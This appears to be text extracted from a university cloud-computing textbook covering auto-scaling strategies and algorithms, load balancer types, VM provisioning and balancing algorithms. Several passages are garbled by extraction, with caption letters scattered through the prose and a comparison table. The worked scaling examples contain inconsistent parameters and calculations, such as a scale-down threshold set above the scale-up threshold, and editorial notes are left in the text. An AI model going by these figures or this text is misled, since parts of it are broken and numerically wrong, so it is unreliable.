Figure 2. Semi-automatic scaling in cloud environments. 3


SCALING

such scenarios, downtime is minimized and scaling is easy to achieve.

On the other hand, scaling saves cost of hardware setup for some small time
peaks or dips in load. In general most cloud service providers provide scaling
as a process for free and charge for the additional resource used. Scaling is also
a common service provided by almost all cloud platforms. Also need to
mention that user saves when usage of the resources declines by using scale
down.?

5.4 SCALING SRATEGIES

Let us now see what are the strategies for scaling, how one can achieve scaling
in a cloud environment and what are its types. In general, scaling is categorized
based on the decision taken for achieving scaling. The three main strategies for
scaling are discussed below.

5.4.1 Proactive Scaling

Consider a scenario when a huge surge in traffic is expected on one of the


applications in the cloud. In this situation a proactive scaling is used to cater
the load. The proactive scaling can also be pre scheduled according to the
expected traffic and demand. This also expects the understanding of traffic
flow in advance to utilize maximum resources, however wrong estimates
generally lead to poor resource management. The prior knowledge of the load
helps in better provisioning of the cloud and accordingly minimum lag is
experienced by the end users when sudden load arrives. The given below
figure shows the resource provision when load increases with time.
Load

Time of Day

4
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY
5.4.2 Reactive Scaling

The reactive scaling often monitors and enables smooth workload changes to
work easily with minimum cost. It empowers users to easily scale up or down
computing resources rapidly. In simple words, when the hardwares like CPU
or RAM or any other resource touches highest utilization, more of the
resources are added to the environment by the service providers. The auto
scaling works on the policies defined by the users/ resource managers for
traffic and scaling. One major concern with reactive scaling is a quick change
in load, i.e. user experiences lags when infrastructure is being scaled.

F
i
g
u
F r
Load

i e
g
u 1
r .
e
M
1 a
. n
Time of Day
u
M a
5.4.3 Combinational Scaling
a l
n
Till now we have seen uneed based
s and forecast based scaling techniques for
scaling. However, for better
a performance
c and low cool down period we can
also combine both of the l reactive
a and proactive scaling strategies where we
have some prior knowledge lof traffic. This helps us in scheduling timely
s
scaling strategies for expected iload. On the other hand, we also have provision
c
of load based scaling apart fromn the predicted load on the application. This
a
way both the problems of sudden g and expected traffic surges are addressed.
l
i i
Given below is the comparison between proactive and reactive scaling
n n
strategies. g
t
Parameters i r
Proactive Scaling Reactive Scaling
n a
Suitability For applications
d increasing For applications increasing loads in
loads tin expected/
i known unexpected/ unknown manner
mannerr t
a
Working User sets thei threshold but a User defined threshold values
d o
i n 5
t a
i l
o
SCALING
downtime is required. optimize the resources

Cost Reduction Medium cost reduction Medium cost reduction

Implementation A few steps required Fixed number of steps required

Check your Progress 1

1) Explain the importance of scaling in cloud computing?


…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

2) How proactive scaling is achieved through virtualization?


…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

3) Write differences between combinational and reactive scaling.

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………………………………

5.5 AUTO SCALING IN CLOUD

One of the potential risks in scaling a cloud infrastructure is its magnitude of


scaling. If we scale it down to a very low level, it will adversely affect the
throughput and latency. In this case, a high latency will be affecting the user’s
experience and can cause dissatisfaction of the users. On the other hand, if we
scale-up the cloud infrastructure to a large extent then it will not be a resource
optimization and also would cost heavily, affecting the host and the whole
purpose of cost optimization fails.

In a cloud, auto scaling can be achieved using user defined policies, various
machine health checks and schedules. Various parameters such as Request
counts, CPU usage and latency are the key parameters for decision making in
autoscaling. A policy here refers to the instruction sets for clouds in case of a
particular scenario (for scaling -up or scaling -down). The autoscaling in the
cloud is done on the basis of following parameters.

6
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY

1. The number of instances required to scale.


2. Absolute no. or percentage (of the current capacity)

The process of auto scaling also requires some cooldown period for resuming
the services after a scaling takes place. No two concurrent scaling are triggered
so as to maintain integrity. The cooldown period allows the process of
autoscaling to get reflected in the system in a specified time interval and saves
any integrity issues in cloud environment.

Costs

Workload

Time

Figure 4. Automatic scaling in cloud environments

Consider a more specific scenario, when the resource requirement is high for
some time duration e.g. in holidays, weekends etc., a Scheduled scaling can
also be performed. Here the time and scale/ magnitude/ threshold of scaling
can be defined earlier to meet the specific requirements based on the previous
knowledge of traffic. The threshold level is also an important parameter in auto
scaling as a low value of threshold results in under utilization of the cloud
resources and a high level of threshold results in higher latency in the cloud.

After adding additional nodes in scale-up, the incoming requests per second
drops below the threshold. This results in triggering the alternate scale-up-
down processes known as a ping-pong effect. To avoid both underscaling and
overscaling issues load testing is recommended to meet the service level
agreements (SLAs). In addition, the scale-up process is required to satisfy the
following properties. Need to brief on SLA also?

1. The number of incoming requests per second per node > threshold of
scale down, after scale-up.
2. The number of incoming requests per second per node < threshold of
scale up, after scale-down

Here, in both the scenarios one should reduce the chances of ping-pong effect.

7
SCALING
Now we know what scaling is and how it affects the applications hosted on the
cloud. Let us now discuss how auto scaling can be performed in fixed amounts
as well as in percentage of the current capacity.

Fixed amount autoscaling


As discussed earlier, the auto scaling can be achieved by determining the
number of instances required to scale by a fixed number. The detailed
algorithm for fixed amount autoscaling threshold is given below. The
algorithm works for both scaling-up and scaling-down and takes inputs U and
D for both respectively.

--------------------------------------------------------------------------------------------
Algorithm : 1
--------------------------------------------------------------------------------------------
Input : SLA specific application
Parameters:
N_min minimum number of nodes
D - scale down value.
U scale up value.
T_U scale up threshold
T_D scale down threshold

Let T (SLA) return the maximum incoming request per second (RPS) per node
for the specific SLA.

T_D ← 0.50 x T_U


T_U ← 0.90 x T (SLA)

Let N_c and RPS_n represent the current number of nodes and incoming
requests per second per node respectively.

L1: /* scale up (if RPS_n> T_U) */


Repeat:
N_(c_old) ←N_c
N_c ←N_c + U
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n> T_U

L2: /* scale down (if RPS_n< T_D) */

Repeat:
N_(c_old) ←N_c
N_c ← max(N_min, N_c - D)
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n< T_D or N_c = N_min

8
RESOURCE PROVISIONING,
LOAD BALANCING AND
Now, let us discuss how this algorithm works in detail. Let the values of a few SECURITY

parameters are given as U = 2, D = 2, T_U = 120 and T_D = 150. Suppose in


the beginning, RPS = 450 and N_c = 4. Now RPS is increased to 1800 and
RPS_n almost reached to T_U, in this situation an autoscaling request is
generated leading to adding U = 2 nodes. Table - 1 lists all the parameters as
per the scale -up requirements.

Nodes Nodes RPS RPS_n Total nodes New


(Current) (added) (required) RPS_n

4 0 450 112.5 4

1800

2 6 300

2510

2 8 313.75

3300

2 10 330.00

4120

2 12 343.33

5000

2 14 357.14

Similarly, in case of scaling down, let initially RPS = 8000 and N_c = 19. Now
RPS is reduced to 6200 and following it RPS_n reaches T_D, here an
autoscaling request is initiated deleting D = 2 nodes. Table - 2 lists all the
parameters as per the scale -down requirements.

Nodes Nodes RPS RPS_n Total New


(Current) (reduced) (required) nodes RPS_n

18 8000 421.05 19

6200

2 17 364.7

4850

2 15 323.33

3500

9
SCALING
2 13 269.23

2650

2 11 240.90

1900

2 8 211.11
The given table shows the stepwise increase/ decrease in the cloud capacity
with respect to the change in load on the application(request per node per
second).

Percentage Scaling:

In the previous section we discussed how scaling up or down is carried out by


a fixed amount of nodes. Considering the situation when we scale up or down
by a percentage of current capacity we change using percentage change in
current capacity. This seems a more natural way of scaling up or down as we
are already running to some capacity.

The below given algorithm is used to determine the scale up and down
thresholds for respective autoscaling.

-----------------------------------------------------------------------------------------------
Algorithm : 2
-----------------------------------------------------------------------------------------------
Input : SLA specific application
Parameters:
N_min - minimum number of nodes
D - scale down value.
U - scale up value.
T_U - scale up threshold
T_D - scale down threshold

Let T (SLA) returns the maximum requests per second (RPS) per node for
specific SLA.

T_U ← 0.90 x T (SLA)


T_D ← 0.50 x T_U

Let N_c and RPS_n represent the current number of nodes and incoming
requests per second per node respectively.

L1: /* scale up (if RPS_n> T_U) */


Repeat:
N_(c_old) ←N_c

10
RESOURCE PROVISIONING,
LOAD BALANCING AND
N_c ←N_c + max(1, N_c x U/100) SECURITY

RPS_n ←RPS_n x N_(c_old) / N_c


Until RPS_n> T_U

L2: /* scale down (if RPS_n< T_D) */

Repeat:
N_(c_old) ←N_c
N_c ← max(N_min, N_c - max(1, N_c x D/ 100))
RPS_n ←RPS_n x N_(c_old) / N_c
Until RPS_n< T_D or N_c = N_min

Let us now understand the working of this algorithm by an example. Let


N_min = 1, at the beginning RPS = 500 and N_c = 6. Now the demand rises
and RPS reaches to 1540 while RPS_n reaches T_U. Here an upscaling is
requested adding 1 i.e. max(1, 6 x 10/200) nodes.

Similarly in case of scaling down, initial RPS = 5000 and N_c = 19, here RPS
reduces to 4140 and RPS_n reaches T_D requesting scale down and hence
deleting 1 i.e. max(1, 1.8 x 8/100). The detailed example is explained using
Table -3 giving details of upscaling with D = 8, U = 1, N_min = 1, T_D = 230
and T_U = 290 .

Nodes Nodes RPS RPS_n Total New


(Current) (added) (required) nodes RPS_n

6 0 500 83.33 6

1695

1 7 242.14

2190

1 8 273.75

2600

1 9 288.88

3430

1 10 343.00

3940

1 11 358.18

4420

1 12 368.33

11
SCALING
4960

1 13 381.53

5500

1 14 392.85

5950

1 15 396.6

The scaling down with the same algorithm is detailed in the table below.

Nodes Nodes RPS RPS_n Total New


(Current) (added) (required) nodes RPS_n

19 5000 263.15 19

3920

1 18 217.77

3510

1 17 206.47

3200

1 16 200

2850

1 15 190

2600

1 14 185.71

2360

1 13 181.53

2060

1 12 171.66

1810

1 11 164.5

1500

150

12
RESOURCE PROVISIONING,
LOAD BALANCING AND
Here if we compare both the algorithms 1 and 2, it is clear that the values of SECURITY

the threshold U and D are at the higher side in case of 2. In this scenario the
utilization of hardware is more and the cloud experiences low footprints.

Check your Progress 2


1) Explain the concept of fixed amount auto scaling.
…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

2) In Algorithm 1 for fixed amount auto scaling, calculate the values in table
if U = 3.
…………………………………………………………………………
…………………………………………………………………………
…………………………………………………………………………

3) What is a cool down period?

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………………………………

5.6 TYPE OF SCALING

Let us now discuss the types of scaling, how we see the cloud infrastructure for
capacity enhancing/ reducing. In general we scale the cloud in a vertical or
horizontal way by either provisioning more resources or by installing more
resources.

5.6.1 Vertical scaling or scaling up

The vertical scaling in the cloud refers to either scaling up i.e. enhancing the
computing resources or scaling down i.e. reducing/ cutting down computing
resources for an application. In vertical scaling, the actual number of VMs are
constant but the quantity of the resource allocated to each of them is increased/
decreased. Here no infrastructure is added and application code is also not
changed. The vertical scaling is limited to the capacity of the physical machine
or server running in the cloud. If one has to upgrade the hardware requirements
of an existing cloud environment, this can be achieved by minimum changes.

13
SCALING

B 4 CPUs

vertical scaling
A 2 CPUs

An IT resource (a virtual server with two CPUs) is scaled up by replacing it with a more
powerful IT resource with increased capacity for data storage (a physical server with four CPUs).

5.6.2 Horizontal scaling or scaling out

In horizontal scaling, to meet the user requirements for high availability,


excess resources are added to the cloud environment. Here, the resources are
added/ removed as VMs. This includes addition of storage disks, new server
for increasing CPUs or installation of additional RAMs and work like a single
system. To achieve horizontal scaling, a minimum downtime is required. This
type of scaling allows one to run distributed applications in a more efficient
manner.

14
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY
Pooled
physical
servers

virtual demand demand


servers

A A B A B C

horizontal scaling
An IT resource (Virtual Server A) is scaled out by adding more of the same IT resources (Virtual Servers B and C).

Another way of maximizing the resource utilization is Diagonal Scaling. This


combines the ideas of both vertical and horizontal scaling. Here, the resource is
scaled up vertically till one hit the physical resource capacity and afterwards
new resources are added like horizontal scaling. The new added resources have
further capacity of being scaled like vertical scaling.

SUMMARY

In the end, we are now aware of various types of scaling, scaling strategies and
their use in real situations. Various cloud service providers like Amazon AWS,
Microsoft Azure and IT giants like Google offer scaling services on their
application based on the application requirements. These services offer good
help to the entrepreneurs who run small to medium businesses and seek IT
infrastructure support. We have also discussed various advantages of
cloudscaling for business applications.

SOLUTION/ANSWERS

Answers to CYPs 1.

1. Explain the importance of scaling in cloud computing: Clouds being used


extensively in serving applications and in other scenarios where the cost and
installation time of infrastructure/ capacity scaling is expectedly high. Scaling helps in
achieving optimized infrastructure for the current and expected load for the
applications with minimum cost and setup time. Scaling also helps in reducing the
disaster recovery time if happens. (for details see section 5.3)
15
SCALING

2. How proactive scaling is achieved through virtualization: The proactive scaling is


a process of forecasting and then managing the load on the could infrastructure in
advance. The precise forecasting of the requirement is key to success here. The
preparedness for the estimated traffic/ requirements is done using the virtualization. In
virtualization, various resources may be assigned to the required machine in no time
and the machine can be scaled to its hardware limits. The virtualization helps in
achieving low cool down period and serve instantly. (for details you may refer
Resource Utilization Unit.)

3) Write differences between proactive and reactive scaling: The reactive scaling
technique only works for the actual variation of load on the application however, the
combination works for both expected and real traffic. A good estimate of load
increases performance of the combinational scaling.

Answers to CYPs 2.

1) Explain the concept of fixed amount auto scaling: The fixed amount scaling is a
simplistic approach for scaling in cloud environment. Here the resources are scaled
up/ down by a user defined number of nodes. In fixed amount scaling resource
utilization is not optimized. It can also happen that only a small node can solve the
resource crunch problem but the used defined numbers are very high leading to
underutilized resources. Therefore a percentage amount of scaling is a better
technique for optimal resource usage.

2) In Algorithm 1 for fixed amount auto scaling, calculate the values in table if U = 3:
For the given U = 3, following calculation are made.

Nodes Nodes RPS RPS_n Total nodes New


(Curren (added) (required) RPS_n
t)

4 0 450 112.5 4

1800

3 7 257.14

2510

3 10 251

3300

3 13 253.84

4120

3 16 257.50
16
RESOURCE PROVISIONING,
LOAD BALANCING AND
SECURITY
5000

3 19 263.15

3) What is a cool down period: When auto scaling takes place in cloud, a small time
interval (pause) prevents the triggering next auto scale event. This helps in
maintaining the integrity in the cloud environment for applications. Once the cool
down period is over, next auto scaling event can be accepted.

17
UNIT 6

Introduction to Load Balancing:


What is Load Balancing:
It is a practice in parallel computing that distributes jobs over several computers (or other
resources) in order to make the whole process easier and more efficient. Making sure that no
single server carries too much demand and equally dividing the load increases user
responsiveness and website availability.
It is possible to achieve a balanced workload by utilising load balancing to distribute the
work among several devices or hardware components. Devices are often distributed among a
number of servers or across the CPU and hard drives of a single cloud server, depending on
the configuration.
Several factors led to the introduction of load balancing. You may either make each gadget
run faster or keep it from reaching its performance limits by limiting the pace of each one.
In cloud computing, load balancing is the process of distributing the workload and computer
resources. By spreading resources over several computers, networks, or servers, it allows
businesses to better manage workloads and application needs. Traffic and demand on the
Internet may be managed by cloud load balancing.
The amount of traffic on the Internet is increasing at an accelerating rate, accounting for
nearly all of the existing traffic each year. As a result, server workloads are fast growing,
resulting in server overload, particularly for prominent web servers. Overcoming the issue of
server overload may be accomplished in two ways. For starters, you can use a single server
that's been updated to a higher-capacity model. However, the new server may quickly
become overwhelmed, necessitating a fresh update. Furthermore, the upgrade procedure is
time-consuming and costly.
In a second approach, a cluster of servers is used to create a scalable service system. As a
result, setting up a server cluster system to provide network services is more cost-effective
and more scalable.
Cloud-based servers can achieve more precise scalability and availability by using farm
server load balancing. There are several benefits to load balancing, including the ability to
distribute traffic over multiple servers.
In addition, it promotes sturdiness by creating redundant systems. The balancing service is
provided by a specific hardware device or software application.
There are no modern programmes or websites that can function without balancing the
demands placed on them. This is due to the fact that these programmes and websites handle
millions of simultaneous requests from end-users and provide the right text and graphics or
relevant data requested, responsively, and reliably. So far, increasing the number of servers
was considered excellent practice for dealing with such large traffic levels.
With a specialized Load Balancer, on the other hand, you can keep your website or
application running at top efficiency while still providing an excellent user experience.
History of Load Balancing:
In 1990, dedicated hardware was used to spread traffic over a network as part of the load
balancing idea. Even at peak periods when demand is high, load balancing has become more
safe thanks to the introduction of Application Delivery Controllers (ADCs).
Hardware Appliance, Virtual Appliance, and Software Native Load Balancing ADCs are all
subcategories of ADCs Cloud computing now allows software-based ADCs to perform the
same functions as their hardware counterparts, but with greater scalability, capability, and
adaptability than ever before.
In cloud computing, load balancing is the process of distributing workloads and computing
resources. Enterprises can distribute resources over multiple computers, networks, and
servers in order to better manage workload demands or application requirements. In the
cloud, load balancing is the process of maintaining the flow of Internet traffic and requests
for workloads.
Internet traffic continues to expand at a rate of over 100 percent every year. Servers are
becoming overloaded due to a rapid increase in demand, which is especially true for web
servers that are widely used. Solutions to the problem of server overloading can be found in
two simple ways:
The first option is to update the server to a higher-performance model. It's possible that the
new server will get overcrowded and require a second upgrade. In addition, updating is a
lengthy and expensive undertaking.
In the second case, a cluster of servers is used to create an extensible service system. Because
of this, building a server cluster system for network services is more cost-effective and
scalable than a single server.
All kinds of services, from HTTP to SMTP to DNS to FTP to POP/IMAP can benefit from
load balancing. Redundancy also increases reliability. There is a dedicated hardware device
or software programme that provides the balancing service for you. It is possible to achieve
more precise scalability and availability for cloud-based server farms by implementing server
load balancing.
Comprehending how load balancers work:
Your server's Load Balancer is a traffic controller that distributes requests to the most
appropriate server for the task at hand. As a result of this, no server is overworked, ensuring
that performance is not degraded.
Load Balancer aids in the selection of the server best suited to handle the requests when an
organization is trying to satisfy application demand. As a result, the user has a better
experience.
The load balancer manages data flow from the server to the endpoint device by assisting with
the efficient movement of servers. Additionally, the server's request-handling health is
checked, and if it is found to be sick, Load Balancer removes it until it is repaired.
A load balancer can be either a hardware device or a software-based virtual one, depending
on whether the servers are physical or virtual. Requests are sent to the remaining servers
when a server goes down, and requests are instantly moved to the newly added server when a
server is added.
Load balancer types according to their functions:
When it comes to specific network challenges, there are a number of load balancing strategies
to consider:
Network Load Balancer / Layer 4 (L4) Load Balancer :
Load balancing is the allocation of traffic at transport level through routing decisions based
on network factors such as IP addresses and destination ports. Such load balancing is TCP i.e.
level 4, and doesn't take into account any parameters at the application level, such as the kind
of content or cookie data or headers or locations. Network Load Balancing does not examine
the content of individual packets while performing network addressing translations. Instead,
it merely looks at the network layer information and routes traffic based on this.
Application Load Balancer / Layer 7 (L7) Load Balancer:
Load balancing at the highest level of the OSI model, Layer 7, distributes requests depending
on a variety of application-level characteristics. When distributing server load, the L7 load
balancer considers a broader variety of data, including HTTP headers and SSL sessions, and
makes decisions based on the combination of those elements. To regulate server traffic
depending on individual use and behavior, application load balancers use this method.
Global Server Load Balancer/Multi-site Load Balancer:
Worldwide load balancing (GSLB) is an extension of the typical L4 and L7 capabilities of
cloud data centres situated in diverse locations, allowing for efficient global load distribution
without harming the end user experience. When tragedy strikes at one data centre or another,
multi-site load balancers ensure business continuity by distributing traffic over many data
centres, making it possible to quickly recover and continue operations even in the event of a
disaster.
Different Types of Load Balancers, Each with a Special Function:
Software-based load balancers:
In the same way that hardware load balancing works, these are software programmes that
need to be loaded in the system. Commercial and open-source versions are available, and
they're cheaper than hardware alternatives. When using software-based load balancing, you
don't need any special gear or software. The Problem Statement in Load Balancing.
Hardware-based load balancer:
An ASIC-based load balancer is a dedicated device with a specific purpose in mind, such as a
router or firewall. Load balancing at transport level is typically handled by ASICs, as
hardware-based load balancing is significantly faster than software-based solutions. Load
balancers that employ hardware instead of software are called application-specific integrated
circuits (ASICs). Hardware-based load balancing is quicker than software-based load
balancing, hence ASICs are frequently employed to boost network traffic at high speeds.
Virtual Load Balancers:
Load balancing on a virtual computer is what sets this load balancer apart from traditional
software and hardware load balancers.
Because it uses virtualization, this type of load balancer mimics software-based architecture.
Virtual machines run hardware equipment software applications, which then reroutes traffic
as needed. However, these types of load balancers have the same issues as physical on-
premises balancers, namely a lack of central control, a lack of scalability, and an automation
that is severely constrained.
Major Load Balancing Devices are listed here:
Direct Routing Requesting Dispatching Technique:
IBM's Net Dispatcher uses a similar method to request dispatching in this way. The virtual IP
address is shared by both a real server and a load balancing service. In this case, the load
balancer uses a virtual IP address to create an interface that accepts request packets and
directs the packets to the servers that have been specified.
Dispatcher-Based Load Balancing Cluster:
A dispatcher uses server availability, workload, capabilities, and other user-defined criteria to
determine where a TCP/IP request should be sent. If you have multiple servers in a cluster,
the dispatcher module of a load balancer can be used to distribute HTTP requests. Customers
interact as if it were a single server, since the dispatcher distributes the workload across a
large number of nodes in the cluster, making the services provided by each node appear to be
a single virtual service with only a single IP address.
Linux Virtual Load Balancer:
An open-source enhanced load balancing solution used to develop highly scalable and highly
available network services including HTTP, POP3, FTP, SMTP and media and caching
(VoIP). Designed for load balancing and failover, it is an easy-to-use yet powerful device An
Internet Protocol Virtual Server (IPVS), which supports transport-layer load balancing in the
Linux kernel, is the primary entry point for server cluster systems and can be used to
accomplish Layer-4 switching.
Why is it imperative in cloud computing to balance the cloud load?
In the cloud, load balancing is critical for the following reasons.
Load balancing technology is less costly and easier to use than other options. Firms may now
give greater outcomes at a cheaper cost by using this technology.
The scalability of cloud load balancing can help manage website traffic. High-end network
and server traffic may be effectively managed using effective load balancers. In order to
manage and disperse workloads in the face of numerous visitors every second, e-commerce
businesses rely on cloud load balancing.
Load balancers can deal with any abrupt spikes in traffic. For example, if there are too many
requests for university results, the website may be shut down. It is unnecessary to be
concerned about the flow of traffic while using a load balancer. Whatever the scale of the
traffic, load balancers will evenly distribute the website's load over several servers, resulting
in the best outcomes in the shortest amount of time.
The primary benefit of utilizing a load balancer is to ensure that the website does not go
down unexpectedly. This means that if a single node fails, the load is automatically shifted to
another node on the network. It allows for more adaptability, scalability, and traffic handling.
Load balancers are useful in cloud systems because of these qualities. This is to prevent a
single server from taking on too much weight.
Importance of Load Balancing:
There are few industries developing as quickly as the information technology sector. Thank
you cloud computing for generating and exchanging vast amounts of data over the network,
which has allowed firms to better capitalize on their substantial expenditures.
Using virtualized computer resources that are often shared among many users is now possible
for businesses thanks to the cloud. Cloud-based services are already the norm for most
businesses.
Everyone who uses cloud computing or plans to use it should be familiar with the notion of
load balancing.
The information technology sector is one of the most rapidly expanding in the world.
Companies can better capitalize on their big expenditures in cloud computing, which
generates and exchanges a massive volume of data.
Cloud computing has made it possible for businesses to reap the benefits of pooled computer
resources in a virtualized environment. Cloud-based services are already the norm for most
businesses.
Everyone who uses cloud computing or plans to do so should be aware of the notion of load
balancing.
Improved Performance:
Load balancing strategies are less costly and simpler to install than their equivalents.
Organizations can work on their clients' apps considerably faster and give better results at a
cheaper cost.
Keep Website Traffic Up:
Scalability is provided by Cloud Balancing to regulate website traffic. With the aid of
excellent load balancers, you can effortlessly handle high-end user traffic in the presence of
servers and network devices.
Cloud balancing is critical for e-commerce companies like Amazon and Flipkart, which deal
with millions of visits per second. Load balancers assist them in distributing and managing
workloads during promotional and sales activities.
The ability to deal with unexpected traffic surges is essential:
When a sudden influx of traffic is received, load balancers can handle it. A college or
university website, for example, may go offline during the announcement of results if there
are an excessive number of requests arriving at the same time.
They won't have to worry about traffic spikes if they're utilizing load balancers. In order to
provide the best possible performance with the shortest possible response time, load
balancers evenly distribute the entire website's load over many servers.
Flexibility:
Load balancing is used to prevent the website from experiencing a sudden outage. It is
possible to divide the burden among a number of network units or servers, even if a node
fails. This demonstrates the system's scalability, flexibility, and capacity to handle traffic.
Goals of Load Balancing:
Since the dawn of cloud computing, load balancing has grown from a niche function to a
critical component. Each device in a cloud network is designed to handle a specific amount of
traffic.
Levels of Load Balancing:
Virtual Machine Provisioning:
Virtual Machine Provisioning Analogy:
It used to take a lot of time and effort by the IT administrator when they needed to set up a
new server for a certain workload or to provide a specific service for a client. A new machine
needs to be purchased, then it needs to be formatted, installed with the operating system that
is required, and finally it needs to be installed with the necessary services. A server and a
number of security appliances are also required.
With the advent of cloud computing and the IaaS paradigm enabled by virtualization
technologies.
To accomplish the same thing, it takes only a few minutes. To get what you want, all you
have to do is use a self-service portal to provision a virtual server with the necessary
requirements. A public cloud like Amazon Elastic Compute Cloud (EC2) or a private cloud
management solution placed in your data centre can be used to provision the virtual machine
within your organization and within the private cloud setup, or you can use a combination of
both.
Life Cycle of Virtual Machine Provisioning:
When an IT department receives a request for a new server for a certain service, a cycle
begins.
Requests to see the servers' resource pool and match those resources to requirements are now
being processed by the IT administration. Getting started with the provision of the virtual
machine that is required. As soon as it has been provided and started, it will be able to offer
the service specified in a SLA. Virtual resources are being made available, as are free ones.
Process of Virtual Machine Provisioning:
The most common and typical steps of deploying a virtual server are:
Starting with a physical server with sufficient capacity, you'll need to choose an OS template
and a server from a list of available servers.
Installing the proper software is also necessary for this task (operating System you selected in
the previous step, device drivers, middleware, and the needed applications for the service
required).
In order to set up a network and storage resources, you need to customise and configure the
machine (e.g., IP address and Gateway).
With the newly installed software, the virtual server can now be used.
Summary: Server provisioning is the process of determining an organization's specific
hardware and software requirements in order to create a customised server environment
(processor, RAM, storage, networking, operating system, applications, etc.).
Typically, virtual machines can be deployed by manually installing an operating system,
using a prepackaged VM template, cloning an existing VM, or importing a physical server or
a virtual server from another hosting platform. Using P2V (Physical to Virtual) tools and
techniques, it is possible to virtualize and provide physical servers as well (e.g., virt- p2v).
Once a virtual machine has been virtualized, or a new virtual server has been formed in the
virtual environment, a template can be created from it.
Such tasks can be easily accomplished by administrators of virtualization management
systems (VMware, XenServer, etc.) who have access to the tools they need.
Migrating a virtual machine from one physical host to another while it's powered on is known
as live migration (also known as hot or real-time migration).
Virtual machine management in this cloud type is the focus of this article. – IaaS Clouds and
Virtual Machine Management Cloud service providers, such as those mentioned above, all
have the following characteristics:
Using virtualization technologies, they lease computing power to their clients; they provide
public and simple remote interfaces to manage those resources; they charge by the hour; and
their data centres are large enough to provide a seemingly unlimited amount of resources to
their clients (usually touted as 'infinite capacity' or 'unlimited elasticity'). Rather than selling
capacity across public interfaces, private and hybrid clouds focus on supplying capacity to an
organization's internal customers.
OpenNebula's VM model and lifecycle In OpenNebula, there are various stages to the
lifecycle of a virtual machine:
Selection of resources. OpenNebula requires a plan for a VM's location once it has been
requested. Site managers can set OpenNebula to prioritise the resources that are best suited
for a VM, based on information from VMs and physical hosts, utilizing information from
OpenNebula's default scheduler. Haizea's leasing manager, meanwhile, can be used by
OpenNebula to enable more complex scheduling regulations as well. Preparation of the
resources needed for the task at hand. Deployment of the virtual machines' disc images
begins. The VM's disc images are contextualized to work in a specific environment during
the boot phase. Setting up the network and the machine hostname, or registering a new virtual
machine with a service could be required if the VM is part of a larger group of VMs that
provide an application or other service (such a compute cluster or database-based application)
(e.g., the head node in a compute cluster). An automatic installation system (like Puppet or
Quattor), a context server, or a disc image containing the worker node's context data can be
used to contextualize the node (OVF recommendation). Termination of the virtual machine.
OpenNebula's disc images can be returned to a known place when the VM is about to shut
down. It's possible to save changes to the VM for future reference.
Resource Provisioning:

Resource provisioning techniques are classified into two groups based on the application's
needs:
Static Resource Provisioning:
Static provisioning can be used efficiently for any application that has predictable and fixed
demands. When beginning the programme, the user must provide certain needs so that the
service provider can meet them.
Dynamic Resource Provisioning:
Dynamic provisioning allows a VM to be moved to a new VM on-the-fly if the demands on it
change unexpectedly. In this situation, the service provider provides more virtual machines
(VMs) if necessary, and removes them if they are no longer needed.
Response speed, workload, reduced SLA violations, and other factors are all taken into
account when allocating resources.
While completing the task, the resource provisioning algorithm must reply in the shortest
amount of time possible. This software must be able to minimize SLA violations while also
taking into account the workload of each VM.
Resource provisioning approaches must be utilized in order to get the most out of cloud
resources. For example, resource provisioning based on deadlines, cost analyses, and service
level agreements are all common approaches that scholars have advocated for managing
various aspects of resource allocation.
Categories of Load Balancing:
You may need to consider specific types of load balancing for your network, such as SQL
Server load balancing for your relational database, global server load balancing for
troubleshooting across many geographic locations, and DNS server load balancing to ensure
domain name operation. You can also consider load balancer types in terms of the many
cloud-based balancers available (such as the well-known AWS Elastic Load Balancer).
Static Algorithm Approach:
This type of method is used when the load on the system is relatively predictable and hence
static. Because of the static method, all of the traffic is split equally amongst all of the
servers. Implementing this algorithm effectively calls for extensive knowledge of server
resources, which is only known at implementation time.
However, the decision to shift loads does not take into account the current state of the system.
One of the main limitations of a static load balancing method is that load balancing jobs only
begin working once they have been established. It couldn't be used for load balancing on
other devices.
Dynamic Algorithm:
The dynamic process begins by locating the network's lightest server and assigns priority load
balancing to it. As a result, the system's traffic may need to be increased by utilising network
real-time communication. It's all about the present status of the system in this case.
Decisions are made in the context of the present system state, which is a key feature of
dynamic algorithms. Processes can be transferred from high-volume machines to low-volume
machines in real time.
Round Robin Algorithm:
For this algorithm, as its name implies, jobs are assigned in a round-robin fashion using the
name. The initial node is chosen at random, and other nodes are assigned work in a round-
robin fashion. This is one of the simplest strategies for distributing the load on a network.
Processes are assigned to each other in a random order with no regard for priority. When the
workload is evenly distributed throughout the processes, it responds quickly. The loading
time for each procedure varies. Some nodes may be underutilized while others are
overburdened, as a result.
Weighted Round Robin Load Balancing Algorithm:
Round Robin Load Balancing Algorithms using Weighted Round Robins have been created
to address the most problematic aspects of Round Robins. Weights and functions are
distributed according to the weight values in this algorithm.
Higher-capacity processors are valued more highly. Consequently, the servers with the most
traffic will be given the most work. Once the servers are fully loaded, they will see a steady
stream of traffic.
Opportunistic Load Balancing Algorithm:
The opportunistic load balancing technique ensures that each node is always busy. It doesn't
take into account how much work each system is currently doing. Unfinished jobs are
distributed among all nodes regardless of their current burden.
It will take a long time for the job to be completed as an OLB, and the node's implementation
time will not be taken into account, resulting in bottlenecks even when some nodes are
available.
Minimum To Minimum Load Balancing Algorithm:
Under minimum to minimal load balancing, these activities are completed in the shortest
possible amount of time. The function with the smallest value is chosen as a starting point.
The work on the machine is arranged in accordance with that minimal amount of time.
The job is deleted from the list and other tasks on the system are updated. Up to the final
assignment, this procedure will be repeated. This method is most effective when a large
number of little jobs must be performed.
Dynamic Approach:
During runtime, it may dynamically detect the amount of load that needs to be shed and
which system should carry the load.
Dynamic Load Balancing:
Least connection:
Verifies and transmits traffic to those servers that have the fewest connections open at any
one moment. All connections are assumed to demand nearly equal processing power in this
scenario.

Weighted least connection:


If certain servers are better at handling connections than others, managers have the option to
give them various weights.
Weighted response time:
Each server's response time and the number of open connections are averaged together to
decide where traffic should be sent. The algorithm provides speedier service for consumers
by directing traffic to servers with the fastest response times.
Resource-based:
Based on the amount of resources each server has available at any one time, it distributes the
load. The load balancer asks each server's "agent" to determine the server's CPU and memory
capacity before allocating traffic to that server.
